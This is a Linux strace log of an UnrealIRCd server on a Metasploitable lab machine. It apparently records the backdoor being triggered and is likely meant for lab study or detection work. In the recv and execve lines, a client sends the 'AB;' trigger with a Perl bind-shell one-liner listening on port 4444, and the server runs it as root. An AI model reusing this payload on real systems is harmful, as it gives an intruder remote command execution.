4519  07:19:29.000954 select(1024, [2 3 4 7 9], [], NULL, {0, 610000}) = 1 (in [2], left {0, 450000})

4519  07:19:29.158803 clock_gettime(CLOCK_MONOTONIC, {1578, 975823866}) = 0

4519  07:19:29.158823 time(NULL)        = 1495624769

4519  07:19:29.158833 time(NULL)        = 1495624769

4519  07:19:29.158846 gettimeofday({1495624769, 158849}, NULL) = 0

4519  07:19:29.158857 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:19:29.158895 clock_gettime(CLOCK_MONOTONIC, {1578, 975907967}) = 0

4519  07:19:29.158905 gettimeofday({1495624769, 158908}, NULL) = 0

4519  07:19:29.158915 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:19:29.158953 clock_gettime(CLOCK_MONOTONIC, {1578, 975965234}) = 0

4519  07:19:29.158963 accept(2, 0, NULL) = 5

4519  07:19:29.158983 getpeername(5, {sa_family=AF_INET, sin_port=htons(46113), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:19:29.159013 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:19:29.159025 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:19:29.159037 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:19:29.159049 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:19:29.159060 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:19:29.159090 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:19:29.159227 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:19:29.159247 clock_gettime(CLOCK_MONOTONIC, {1578, 976260760}) = 0

4519  07:19:29.159260 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:19:29.159285 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:19:29.159295 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:19:29.159304 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:19:29.159314 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:19:29.159329 send(6, "\264\355\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:19:29.159442 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:19:29.159478 gettimeofday({1495624769, 159482}, NULL) = 0

4519  07:19:29.159490 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 980000})

4519  07:19:29.173346 clock_gettime(CLOCK_MONOTONIC, {1578, 990355144}) = 0

4519  07:19:29.173346 recvfrom(6, "\264\355\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\306\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:19:29.173377 close(6)          = 0

4519  07:19:29.173394 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:19:29.173408 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:19:29.173472 time(NULL)        = 1495624769

4519  07:19:29.173484 time(NULL)        = 1495624769

4519  07:19:29.173496 gettimeofday({1495624769, 173500}, NULL) = 0

4519  07:19:29.173508 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:19:29.173537 clock_gettime(CLOCK_MONOTONIC, {1578, 990550128}) = 0

4519  07:19:29.173548 gettimeofday({1495624769, 173551}, NULL) = 0

4519  07:19:29.173558 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 760000})

4519  07:19:29.413464 clock_gettime(CLOCK_MONOTONIC, {1579, 230473613}) = 0

4519  07:19:29.413465 recv(9, "PRIVMSG  #testit3 ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 45

4519  07:19:29.413465 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413465 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413477 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413491 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413505 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413527 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413540 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413553 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413566 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413580 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413593 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413606 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413619 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413632 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413645 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413658 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413671 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413684 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413697 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413711 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413753 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413768 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:29.413798 gettimeofday({1495624769, 413802}, NULL) = 0

4519  07:19:29.413810 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:19:29.413850 clock_gettime(CLOCK_MONOTONIC, {1579, 230863114}) = 0

4519  07:19:29.413862 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:19:29.413889 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:19:29.413909 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:19:29.413920 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:19:29.413935 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 7593

7593  07:19:29.414018 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

7593  07:19:29.414032 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

7593  07:19:29.414042 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7593  07:19:29.414055 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

7593  07:19:29.414157 brk(0)            = 0x80f9000

7593  07:19:29.414178 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7593  07:19:29.414194 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f3f000

7593  07:19:29.414210 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7593  07:19:29.414258 open("/etc/ld.so.cache", O_RDONLY) = 1

7593  07:19:29.414273 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7593  07:19:29.414305 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f37000

7593  07:19:29.414316 close(1)          = 0

7593  07:19:29.414326 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7593  07:19:29.414342 open("/lib/libncurses.so.5", O_RDONLY) = 1

7593  07:19:29.414354 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

7593  07:19:29.414451 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

7593  07:19:29.414468 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f07000

7593  07:19:29.414480 mmap2(0xb7f34000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f34000

7593  07:19:29.414497 close(1)          = 0

7593  07:19:29.414508 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7593  07:19:29.414522 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7593  07:19:29.414537 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7593  07:19:29.414625 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7593  07:19:29.414641 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f03000

7593  07:19:29.414652 mmap2(0xb7f05000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f05000

7593  07:19:29.414668 close(1)          = 0

7593  07:19:29.414678 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7593  07:19:29.414692 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7593  07:19:29.414705 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7593  07:19:29.414858 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7593  07:19:29.414888 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f02000

7593  07:19:29.414902 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db3000

7593  07:19:29.414912 mmap2(0xb7efc000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7efc000

7593  07:19:29.414927 mmap2(0xb7eff000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eff000

7593  07:19:29.414941 close(1)          = 0

7593  07:19:29.414962 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db2000

7593  07:19:29.414974 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7db26b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7593  07:19:29.415027 mprotect(0xb7efc000, 4096, PROT_READ) = 0

7593  07:19:29.415063 munmap(0xb7f37000, 29913) = 0

7593  07:19:29.415088 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7593  07:19:29.415102 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

7593  07:19:29.415121 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfaa5460) = -1 ENOTTY (Inappropriate ioctl for device)

7593  07:19:29.415150 brk(0)            = 0x80f9000

7593  07:19:29.415159 brk(0x80fa000)    = 0x80fa000

7593  07:19:29.415171 brk(0x80fb000)    = 0x80fb000

7593  07:19:29.415186 getuid32()        = 0

7593  07:19:29.415196 getgid32()        = 0

7593  07:19:29.415204 geteuid32()       = 0

7593  07:19:29.415213 getegid32()       = 0

7593  07:19:29.415364 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7593  07:19:29.415393 time(NULL)        = 1495624769

7593  07:19:29.415406 brk(0x80fc000)    = 0x80fc000

7593  07:19:29.415421 brk(0x80fd000)    = 0x80fd000

7593  07:19:29.415441 open("/proc/meminfo", O_RDONLY) = 1

7593  07:19:29.415476 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

7593  07:19:29.415494 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f3e000

7593  07:19:29.415505 read(1, "MemTotal:      1035240 kB\nMemFree:        549808 kB\nBuffers:         64876 kB\nCached:         263592 kB\nSwapCached:          0 kB\nActive:         254136 kB\nInactive:       203244 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        549568 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4892 kB\nWriteback:           0 kB\nAnonPages:      128984 kB\nMapped:          52008 kB\nSlab:            16672 kB\nSReclaimable:     8468 kB\nSUnreclaim:       8204 kB\nPageTables:       1972 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

7593  07:19:29.415587 close(1)          = 0

7593  07:19:29.415598 munmap(0xb7f3e000, 4096) = 0

7593  07:19:29.415609 brk(0x80fe000)    = 0x80fe000

7593  07:19:29.415635 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7593  07:19:29.415648 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7593  07:19:29.415659 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7593  07:19:29.415671 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7593  07:19:29.415682 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

7593  07:19:29.415694 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

7593  07:19:29.415707 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7593  07:19:29.415718 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7593  07:19:29.415731 uname({sys="Linux", node="metasploitable", ...}) = 0

7593  07:19:29.415780 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

7593  07:19:29.415847 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7593  07:19:29.415895 brk(0x8100000)    = 0x8100000

7593  07:19:29.415908 getcwd("/etc/unreal", 4096) = 12

7593  07:19:29.415935 getpid()          = 7593

7593  07:19:29.415951 getppid()         = 4519

7593  07:19:29.415966 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7593  07:19:29.415986 stat64("/sbin/sh", 0xbfaa5438) = -1 ENOENT (No such file or directory)

7593  07:19:29.415998 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7593  07:19:29.416015 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7593  07:19:29.416038 socket(PF_FILE, SOCK_STREAM, 0) = 1

7593  07:19:29.416051 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7593  07:19:29.416062 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7593  07:19:29.416084 close(1)          = 0

7593  07:19:29.416095 socket(PF_FILE, SOCK_STREAM, 0) = 1

7593  07:19:29.416105 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7593  07:19:29.416115 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7593  07:19:29.416133 close(1)          = 0

7593  07:19:29.416146 open("/etc/nsswitch.conf", O_RDONLY) = 1

7593  07:19:29.416160 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

7593  07:19:29.416176 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f3e000

7593  07:19:29.416187 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

7593  07:19:29.416235 read(1, "", 4096) = 0

7593  07:19:29.416245 close(1)          = 0

7593  07:19:29.416254 munmap(0xb7f3e000, 4096) = 0

7593  07:19:29.416269 open("/etc/ld.so.cache", O_RDONLY) = 1

7593  07:19:29.416282 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7593  07:19:29.416326 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f37000

7593  07:19:29.416337 close(1)          = 0

7593  07:19:29.416362 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7593  07:19:29.416377 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

7593  07:19:29.416391 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

7593  07:19:29.416478 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

7593  07:19:29.416495 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da9000

7593  07:19:29.416506 mmap2(0xb7db0000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7db0000

7593  07:19:29.416526 close(1)          = 0

7593  07:19:29.416537 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7593  07:19:29.416550 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

7593  07:19:29.416564 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

7593  07:19:29.416648 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

